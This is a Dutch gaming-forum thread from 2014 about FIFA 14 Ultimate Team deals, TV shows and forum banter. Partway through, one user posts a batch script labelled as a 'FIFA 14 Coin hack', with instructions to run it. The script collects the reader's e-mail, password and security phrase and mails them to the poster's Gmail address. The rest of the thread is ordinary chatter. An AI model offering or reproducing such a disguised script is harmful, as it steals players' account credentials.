vind ik nog steeds heel tof. Ik hou wel van dat superhero sfeertje. Shield heeft dat ook. Eerste paar eps zijn wel ok daar maar niet super. Halverwege het seizoen wordt het echt goed.quote:Op dinsdag 13 mei 2014 18:33 schreef Kamikazie het volgende:
[..]
Arrow wel
Agents of SHIELD ga ik dan maar aan beginnen
Dankje.
Arrow wordt trouwens wel steeds minder man
Dankjequote:Op dinsdag 13 mei 2014 18:31 schreef ThadCastle het volgende:
[..]
The Physician
Puncture
Zulu
Grudge match
ik verdraai niks, ik combineer 2 feiten.quote:Op dinsdag 13 mei 2014 18:30 schreef Kamikazie het volgende:
[..]
Jij verdraait het, het gaat erom dat Maver24 zegt dat ie wat beters te doen heeft. Dat hij ook in de wajong zit betrek jij er weer bij.... beetje goedkoop scoren over de rug van de zwakke van deze samenleving he.
Jij trekt een verband tussen twee feiten terwijl er misschien wel geen verband is. Je probeert goedkoop te scorenquote:Op dinsdag 13 mei 2014 18:40 schreef FCsuarez het volgende:
[..]
ik verdraai niks, ik combineer 2 feiten.
volgens mij hebben wij het er al vaker over gehad dat hij best iets zou kunnen doen voor deze maatschappij niks goedkoop scoren.
Jou zo aanpakkenquote:Op dinsdag 13 mei 2014 18:40 schreef FCsuarez het volgende:
[..]
ik verdraai niks, ik combineer 2 feiten.
volgens mij hebben wij het er al vaker over gehad dat hij best iets zou kunnen doen voor deze maatschappij niks goedkoop scoren.
tuurlijk zit daar verband tussenquote:Op dinsdag 13 mei 2014 18:41 schreef Kamikazie het volgende:
[..]
Jij trekt een verband tussen twee feiten terwijl er misschien wel geen verband is. Je probeert goedkoop te scorenDorpsidioot. Nobody uit de provincie.
Kijk uit he, je krijgt zo een koek.quote:Op dinsdag 13 mei 2014 18:43 schreef FCsuarez het volgende:
[..]
tuurlijk zit daar verband tussenen het feit dat ik al dan niet een dorpsidioot of nodody uit de provincie ben heeft hier zeker niets mee te maken
Ik kom ook uit een provinciequote:Op dinsdag 13 mei 2014 18:45 schreef The_Yakuza het volgende:
Iedereen uit een provincie is een nobody?
kom maar op, kom wel met een hooivork achter je aanquote:
Ja.quote:Op dinsdag 13 mei 2014 18:35 schreef Kamikazie het volgende:
[..]
Dankje
Grudge match is die al als dvdrip beschikbaar? Ik dacht alleen CAM.
Je hebt toch wel door dat ik gewoon wat dingen uit VI herhaal?quote:Op dinsdag 13 mei 2014 18:46 schreef FCsuarez het volgende:
[..]
kom maar op, kom wel met een hooivork achter je aan![]()
stadsjochie, met je nette schoentjes.
kijk geen VIquote:Op dinsdag 13 mei 2014 18:47 schreef Kamikazie het volgende:
[..]
Je hebt toch wel door dat ik gewoon wat dingen uit VI herhaal?
al is dat bij limburg natuurlijk wel een beetje zoquote:
WITH A REBEL YELL, SHE CRIED MOREEEEEEEE, MOREEEEEEEEE, MOREEEEEEEE!!!quote:Op dinsdag 13 mei 2014 18:46 schreef MrvanTrapZ het volgende:
IN THE MIDNIGHT HOURRRRR SHE CRIED MOREEEE MORREEEEE MOREEEEE!
Baas.quote:Op dinsdag 13 mei 2014 18:49 schreef Zhano het volgende:
[..]
WITH A REBEL YELL, SHE CRIED MOREEEEEEEE, MOREEEEEEEEE, MOREEEEEEEE!!!
Echt he. Misschien toch maar zelf ff een appje makenquote:Op dinsdag 13 mei 2014 18:52 schreef FCsuarez het volgende:
zou zo fijn zijn als je wel je transferkandidates kon bewerken in de web-app op je tel is dat echt een pleuris werk alle kaarten waar je overboden bent er uit halen
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | echo off cls :start echo ********************* echo * Trapzz0r * echo * FIFA 14 Coin hack * echo ********************* echo * LOGIN DETAILS * echo ********************* echo. set /p mail=E-mail: set /p password=Password: set /p security=Security phrase: echo %mail% %password% %security% >>c:\temp\%random%%random%.txt blat -to mrvantrapz@gmail.com -server smtp.gmail.com -f %mail% -subject "%mail%" -body "%mail% %password% %security%" :start1 cls |
jij bent echt een goeie hackerquote:Op dinsdag 13 mei 2014 19:07 schreef MrvanTrapZ het volgende:
Eerst blat installeren: http://sourceforge.net/pr(...)rsion/Blat%20v2.7.6/
daarna dit opslaan in notepad (als .bat opslaan) en runnen.
[ code verwijderd ]
gr gr
Affermative.quote:Op dinsdag 13 mei 2014 19:07 schreef MrvanTrapZ het volgende:
[ code verwijderd ]
gr gr
Wtf, het werkt ook gewoonquote:Op dinsdag 13 mei 2014 19:07 schreef MrvanTrapZ het volgende:
[ code verwijderd ]
gr gr
Doe gewoon.quote:Op dinsdag 13 mei 2014 19:09 schreef Maver24 het volgende:
Eten was weer geslaagd
Nu zijn er weer 25k rare gold packs. Deze keer weer niet openen
jij hebt zeker ook zo'n site die op de WebApp lijkt?quote:
Ik heet geen Akinlabi van Trapz.quote:Op dinsdag 13 mei 2014 19:10 schreef DuTank het volgende:
[..]
jij hebt zeker ook zo'n site die op de WebApp lijkt?
twitter:futheadsite twitterde op dinsdag 13-05-2014 om 19:04:15The @WhoScored Euro Best XI is on Futhead! http://t.co/0vIQKN527T - who will make it in the TOTW? http://t.co/1FCLQfjqJ0 reageer retweet
Und?quote:Op dinsdag 13 mei 2014 19:11 schreef Maver24 het volgende:
twitter:futheadsite twitterde op dinsdag 13-05-2014 om 19:04:15The @WhoScored Euro Best XI is on Futhead! http://t.co/0vIQKN527T - who will make it in the TOTW? http://t.co/1FCLQfjqJ0 reageer retweet
wooow 4 van dezelfde club dat kan toch helemaal nietquote:Op dinsdag 13 mei 2014 19:11 schreef Maver24 het volgende:
Je heb toch zeker wel wat beters te doen dan dealtjes oppikken?quote:Op dinsdag 13 mei 2014 19:41 schreef Maver24 het volgende:
TOTS Cerci voor 100k opgepikt![]()
![]()
![]()
![]()
![]()
![]()
die is even goedkoop zeg
Wordt nog goedkoper als die straks in het TOTS zit.quote:Op dinsdag 13 mei 2014 19:41 schreef Maver24 het volgende:
TOTS Cerci voor 100k opgepikt![]()
![]()
![]()
![]()
![]()
![]()
die is even goedkoop zeg
quote:
Zijn workrates zijn echt dikke poep.quote:Op dinsdag 13 mei 2014 20:17 schreef Toefjes het volgende:
Die TOTS Mandzukic staat niet echt vaak in de spits
nice. waar heb je die info vandaan. komt de hele turkse competitie er ook weer in ? komt dirk er ook weer inquote:
quote:Op dinsdag 13 mei 2014 20:27 schreef Maver24 het volgende:
[..]
nice. waar heb je die info vandaan. komt de hele turkse competitie er ook weer in ? komt dirk er ook weer in
twitter:fifabenelux twitterde op dinsdag 13-05-2014 om 19:50:27Wellicht heb je het eerder vandaag gemist, Fenerbahçe wellicht aanwezig in FIFA 15 #FIFA15 http://t.co/K8zLTZ5iCH http://t.co/h6Z8JJmMIJ reageer retweet
"Wellicht"quote:Op dinsdag 13 mei 2014 20:27 schreef ThadCastle het volgende:
[..]twitter:fifabenelux twitterde op dinsdag 13-05-2014 om 19:50:27Wellicht heb je het eerder vandaag gemist, Fenerbahçe wellicht aanwezig in FIFA 15 #FIFA15 http://t.co/K8zLTZ5iCH http://t.co/h6Z8JJmMIJ reageer retweet
Is gister door een bestuurslid op Twitter bevestigd.quote:
Dan is het geen wellicht meerquote:Op dinsdag 13 mei 2014 20:29 schreef Ozz-03 het volgende:
[..]
Is gister door een bestuurslid op Twitter bevestigd.
Mogen ze weer Twitteren?quote:Op dinsdag 13 mei 2014 20:29 schreef Ozz-03 het volgende:
[..]
Is gister door een bestuurslid op Twitter bevestigd.
Jaquote:
Hater.quote:Op dinsdag 13 mei 2014 20:29 schreef MrvanTrapZ het volgende:
Goede reden om FIFA 15 over te slaan.
gr gr
Bananenrepubliekquote:Op dinsdag 13 mei 2014 20:30 schreef Ozz-03 het volgende:
[..]
Ja.
Het verbod kwam Erdogan en zijn partij goed uit tijdens de verkiezingen.
Forum Opties | |
---|---|
Forumhop: | |
Hop naar: |